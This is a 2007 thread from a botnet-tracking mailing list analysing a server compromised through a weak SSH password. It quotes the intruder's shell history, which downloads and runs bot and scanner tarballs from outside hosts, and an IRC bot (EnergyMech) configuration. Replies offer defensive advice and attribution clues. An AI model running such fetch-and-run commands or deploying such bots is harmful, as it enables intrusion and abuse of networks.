Re: [botnets] mech config captured today

2007-11-16 Thread bodik
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
--

yes, i was a ssh bruteforce. user installed oracle client recently, and
forget to change a password ;(( it was oracle:oracle

bodik

Adriel Desautels wrote:
> How did they get in?
> 
> Regards,
>   Adriel T. Desautels
>
>> access was gained by very very weak password, and standard procedure
>> comes, download bot, ssh cracker, spam tool ...


___
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets


Re: [botnets] mech config captured today

2007-11-16 Thread J. Oquendo
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
--bodik wrote:

> 
> yes, i was a ssh bruteforce. user installed oracle client recently, and
> forget to change a password ;(( it was oracle:oracle

After all this time I don't know how come stupid administrators are
given access to administrate machines. How hard can it be to block in
all (iptables, ipfw, ipf, etc) to ssh minus the ones that need access.
It boggles me.

How hard was it to find and install something easily found on the
Internet (ossec) to mitigate against this? About 1 minute

./install

Some of these compromised businesses need to start giving idiot admins
the boot. Sorry if its off-topic, harsh, etc., but man experience,
training, common sense sure go a long way.


J. Oquendo

SGFA (FW+VPN v4.1)
SGFE (FW+VPN v4.1)

"I hear much of people's calling out to punish the
guilty, but very few are concerned to clear the
innocent." Daniel Defoe

http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xF684C42E



smime.p7s
Description: S/MIME Cryptographic Signature
___
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets


Re: [botnets] mech config captured today

2007-11-16 Thread Steven Adair
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
--

Just taking a wild stab in the dark, I'd bet on SSH brute force.  A number of 
groups on Undernet (Romanian ones especially) are known to SSH brute force 
attack boxes and then install mech and put up a bunch of clones in an IRC 
channel from the box.  Here's a nice example of the classic scenario (sometimes 
it's more automated though):

http://lists.virus.org/dshield-0407/msg00193.html

Steven

On Fri, 16 Nov 2007 12:08:49 -0500, Adriel Desautels <[EMAIL PROTECTED]> wrote:
> To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> --
> 

___
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets


Re: [botnets] mech config captured today

2007-11-16 Thread Adriel Desautels
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
--How did they get in?

Regards,
Adriel T. Desautels
Chief Technology Officer
Netragard, LLC.
Office : 617-934-0269
Mobile : 617-633-3821
http://www.linkedin.com/pub/1/118/a45

---
Netragard, LLC - http://www.netragard.com  -  "We make IT Safe"
Penetration Testing, Vulnerability Assessments, Website Security


bodik wrote:
> To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> --
> Hi,
> 
> we've found one instance of bot from someone called Drow (tools were
> compiled but not stripped somewhere in /home/drow ... ;))). Probably a
> spanish speaking person.
> 
> Undernet admins should take a look down below and check their servers.
> if there are listening here ..
> 
> access was gained by very very weak password, and standard procedure
> comes, download bot, ssh cracker, spam tool ...
> 
> was a kiddie, comes from 89.123.217.233, no with no cleanup and probably
> a manual job ..
> 
>  cut history 
> 
> passwd
> 
> ps x
> 
> cd /tmp
> 
> w
> 
> ps x
> 
> cd /tmp
> 
> wget freewebs.com/staycu/stayku.tar
> 
> tar xzvf stayku.tar
> 
> cd .staycu
> 
> ./linux
> 
> cat /proc/cpuinfo
> 
> cd /var/tmp/delles
> 
> cd /var/tmp
> 
> wget http://www.geocities.com/demonfire_16/delles.tar.gz
> 
> tar xzvf delles.tar.gz
> 
> cd delles
> 
> ./a 200.62
> 
> nohup ./start 59 >> /dev/null &
> 
> cd /var/tmp/delles
> 
> cat vuln.txt
> 
> ps x
> 
> cd /var/tmp/delles
> 
> cat vuln.txt
> 
> ps x
> 
> cd /var/tmp/delles
> 
> cat vuln.txt
> ...
> ...
>  cut history 
> 
> bodik
> 
>  cut 
> 
> # Boqdan`S EnergyMech configuration file
> # v2.9.3 - Boqdan
> 
> # Linking #
> #ENTITYemech
> #LINKPASS  abc123
> #LINKPORT  49152
> #LINK  hismech a1b2c3 mech.host.net 49152
> #LINK  hermech abcdefg 0 0
> AUTOLINK
> 
> # Server List 
> SERVER diemen.nl.eu.undernet.org 6660
> SERVER diemen.nl.eu.undernet.org 6667
> SERVER diemen.nl.eu.undernet.org 6669
> SERVER lelystad.nl.eu.undernet.org 
> SERVER lelystad.nl.eu.undernet.org 6667
> SERVER lelystad.nl.eu.undernet.org 6668
> SERVER london2.uk.eu.undernet.org 6660
> SERVER london2.uk.eu.undernet.org 6669
> SERVER london2.uk.eu.undernet.org 7000
> SERVER graz.at.eu.undernet.org 6660
> SERVER graz.at.eu.undernet.org 6670
> SERVER graz.at.eu.undernet.org 7000
> SERVER helsinki.fi.eu.undernet.org 
> SERVER helsinki.fi.eu.undernet.org 6669
> SERVER helsinki.fi.eu.undernet.org 7000
> SERVER montreal.qc.ca.undernet.org 6665
> SERVER montreal.qc.ca.undernet.rog 6669
> SERVER montreal.qc.ca.undernet.org 7000
> SERVER oslo2.no.eu.undernet.org 6660
> SERVER oslo2.no.eu.undernet.org 6669
> SERVER oslo2.no.eu.undernet.org 7000
> 
> 
> 
> # SERVER  1.2.3.4 6667   ThisIsMyPassword
> # SERVER 192.168.100.16669  moo:eu.undernet.org:6667
> 
> # Bot 1 Configuration #
> NICK  Boqdan
> USERFILE  1
> CMDCHAR   -
> LOGIN gat
> IRCNAME  tundd
> MODES +ix-ws
> #VIRTUAL
> #NOSEEN
> 
> HASONOTICE  1   # Yes for Undernet.
> TOG CC  1   # We want the bot to require command character
> TOG CLOAK   1   # Ignore CTCP's from non-users? Yes.
> TOG SPY 1   # Tell who is executing what in the partyline.
> SET OPMODES 6   # How many modes in a line? 6 on undernet...
> SET BANMODES6   # How many bans in a line? 6 on undernet...
> SET CTIMEOUT60  # Server connection timeout
> SET CDELAY  30  # Delay between connection attempts
> 
> CHANNEL #staycu.com # Channel name
> TOG PUB 1   # Allow public(in-channel) commands? Yes.
> TOG MASS1   # Do mass-mode/kick/ban checks...
> TOG SHIT1   # Activate the shitlist for this channel
> TOG PROT1   # Activate protection of users
> TOG ENFM0   # Dont enforce channel modes.
> SET MDL 5   # How many -o before killing the guy?
> SET MKL 5   # How many kicks?
> SET MBL 5   # And how many Bans?
> SET MPL 1   # What to do with massmoders?
> #   0 = nothing,
> #   1 = kick the bastard,
> #   2 = kickban 'em,
> #   3 = kickban & shitlist them.
> # END BOT 1 #
> 
> # Bot 2 Configuration #
> 
> NICK  Guapo
> USERFILE  1
> CMDCHAR   -
> LOGIN lmess
> IRCNAME   mesaju
> MODES +ix-ws
> #VIRtual
> #NOSEEN
> 
> HASONOTICE  1   # Yes for Undernet.
> TOG CC  1   # We want the bot to require command character
> TOG CLOAK   1   # Ignore CTCP's from non-users? Yes.
> TOG SPY 1   # Tell who is executing what in the partyline.
> SET OPMODES 6   # How many modes in a line? 6 on undernet...
> SET BANMODES6   # How many bans 

Re: [botnets] mech config captured today

2007-11-16 Thread Attila-Mihaly Balazs
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
--
Hello all.

This is my first post, so excuse me if I didn't follow some of the 
etiquette and please kindly show me the right direction ;)

Anyway, I just wanted to say that this one is from our neck of the woods 
(ie. Romania), since the IP given is from Bucharest, the capitol of 
Romania. Also, a quick lookup 
(http://www.dnsstuff.com/tools/whois.ch?ip=89.123.217.233) reveals that 
the IP belongs to the Romanian Telecom provider RomTelecom. However the 
kid may be localized anywhere in the country, since RomTelecom uses the 
exit point in Bucharest for all of their ADSL lines. Also, all of the 
text in the binaries which isn't in English, is in Romanian.

Some more hints:
The binaries contain references to the Undernet channel #Linux-Team 
which is invite only as of this moment. Other people mentioned by 
nickname are: MiKuTuL (this means "the small one" in Romanian, although 
it is not written correctly), Serano, Cortez, Arni neam, Gluu, BadBoys. 
The text also contains references to "unguri satmareni", which means: 
"the hungarians from Satu-Mare", Satu Mare being a county of Romania 
(http://www.satu-mare.ro/). If you search for "unguri satmareni", you 
will get two other complaints of servers being hacked.

Hope this was helpful. Best regards.


-- 
Attila-Mihaly BALAZS
Virus Researcher
BitDefender
--
Email: [EMAIL PROTECTED]
Phone: +40 264 443 008
--
www.bitdefender.com

-- 
The content of this message and attachments are confidential and are 
classified as BitDefender's Proprietary Information. The content of 
this message is intended solely for the use of the individual or entity 
to whom it is addressed and others authorized to receive it. If you are 
not the intended recipient you are hereby notified that any disclosure, 
copying, distribution or taking any action based on this information are 
strictly prohibited and may be precluded by law. If you have received 
this message in error, please notify us immediately and then delete it 
from your system. BitDefender SRL is neither liable for the proper and 
complete transmission of the information contained in this message nor 
for any delay in its receipt.

___
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets


[botnets] mech config captured today

2007-11-16 Thread bodik
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
--
Hi,

we've found one instance of bot from someone called Drow (tools were
compiled but not stripped somewhere in /home/drow ... ;))). Probably a
spanish speaking person.

Undernet admins should take a look down below and check their servers.
if there are listening here ..

access was gained by very very weak password, and standard procedure
comes, download bot, ssh cracker, spam tool ...

was a kiddie, comes from 89.123.217.233, no with no cleanup and probably
a manual job ..

 cut history 

passwd

ps x

cd /tmp

w

ps x

cd /tmp

wget freewebs.com/staycu/stayku.tar

tar xzvf stayku.tar

cd .staycu

./linux

cat /proc/cpuinfo

cd /var/tmp/delles

cd /var/tmp

wget http://www.geocities.com/demonfire_16/delles.tar.gz

tar xzvf delles.tar.gz

cd delles

./a 200.62

nohup ./start 59 >> /dev/null &

cd /var/tmp/delles

cat vuln.txt

ps x

cd /var/tmp/delles

cat vuln.txt

ps x

cd /var/tmp/delles

cat vuln.txt
...
...
 cut history 

bodik

 cut 

# Boqdan`S EnergyMech configuration file
# v2.9.3 - Boqdan

# Linking #
#ENTITYemech
#LINKPASS  abc123
#LINKPORT  49152
#LINK  hismech a1b2c3 mech.host.net 49152
#LINK  hermech abcdefg 0 0
AUTOLINK

# Server List 
SERVER diemen.nl.eu.undernet.org 6660
SERVER diemen.nl.eu.undernet.org 6667
SERVER diemen.nl.eu.undernet.org 6669
SERVER lelystad.nl.eu.undernet.org 
SERVER lelystad.nl.eu.undernet.org 6667
SERVER lelystad.nl.eu.undernet.org 6668
SERVER london2.uk.eu.undernet.org 6660
SERVER london2.uk.eu.undernet.org 6669
SERVER london2.uk.eu.undernet.org 7000
SERVER graz.at.eu.undernet.org 6660
SERVER graz.at.eu.undernet.org 6670
SERVER graz.at.eu.undernet.org 7000
SERVER helsinki.fi.eu.undernet.org 
SERVER helsinki.fi.eu.undernet.org 6669
SERVER helsinki.fi.eu.undernet.org 7000
SERVER montreal.qc.ca.undernet.org 6665
SERVER montreal.qc.ca.undernet.rog 6669
SERVER montreal.qc.ca.undernet.org 7000
SERVER oslo2.no.eu.undernet.org 6660
SERVER oslo2.no.eu.undernet.org 6669
SERVER oslo2.no.eu.undernet.org 7000



# SERVER  1.2.3.4 6667   ThisIsMyPassword
# SERVER 192.168.100.16669  moo:eu.undernet.org:6667

# Bot 1 Configuration #
NICK  Boqdan
USERFILE  1
CMDCHAR   -
LOGIN gat
IRCNAME  tundd
MODES +ix-ws
#VIRTUAL
#NOSEEN

HASONOTICE  1   # Yes for Undernet.
TOG CC  1   # We want the bot to require command character
TOG CLOAK   1   # Ignore CTCP's from non-users? Yes.
TOG SPY 1   # Tell who is executing what in the partyline.
SET OPMODES 6   # How many modes in a line? 6 on undernet...
SET BANMODES6   # How many bans in a line? 6 on undernet...
SET CTIMEOUT60  # Server connection timeout
SET CDELAY  30  # Delay between connection attempts

CHANNEL #staycu.com # Channel name
TOG PUB 1   # Allow public(in-channel) commands? Yes.
TOG MASS1   # Do mass-mode/kick/ban checks...
TOG SHIT1   # Activate the shitlist for this channel
TOG PROT1   # Activate protection of users
TOG ENFM0   # Dont enforce channel modes.
SET MDL 5   # How many -o before killing the guy?
SET MKL 5   # How many kicks?
SET MBL 5   # And how many Bans?
SET MPL 1   # What to do with massmoders?
#   0 = nothing,
#   1 = kick the bastard,
#   2 = kickban 'em,
#   3 = kickban & shitlist them.
# END BOT 1 #

# Bot 2 Configuration #

NICK  Guapo
USERFILE  1
CMDCHAR   -
LOGIN lmess
IRCNAME   mesaju
MODES +ix-ws
#VIRtual
#NOSEEN

HASONOTICE  1   # Yes for Undernet.
TOG CC  1   # We want the bot to require command character
TOG CLOAK   1   # Ignore CTCP's from non-users? Yes.
TOG SPY 1   # Tell who is executing what in the partyline.
SET OPMODES 6   # How many modes in a line? 6 on undernet...
SET BANMODES6   # How many bans in a line? 6 on undernet...
SET CTIMEOUT60  # Server connection timeout
SET CDELAY  30  # Delay between connection attempts

CHANNEL #staycu.com # Channel name
TOG PUB 1   # Allow public(in-channel) commands? Yes.
TOG MASS1   # Do mass-mode/kick/ban checks...
TOG SHIT1   # Activate the shitlist for this channel
TOG PROT1   # Activate protection of users
TOG ENFM0   # Dont enforce channel modes.
SET MDL 5   # How many -o before killing the guy?
SET MKL 5   # How many kicks?
SET MBL 5   # And how many Bans?
SET MPL 1   # What to do with massmoders?
#   0 = nothing,
#   1 = kick the bastard,
#   2 = kickban 'em,
#   3 = kic